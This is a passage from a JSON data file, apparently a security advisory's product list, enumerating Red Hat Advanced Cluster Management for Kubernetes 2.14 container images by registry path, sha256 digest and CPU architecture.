"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
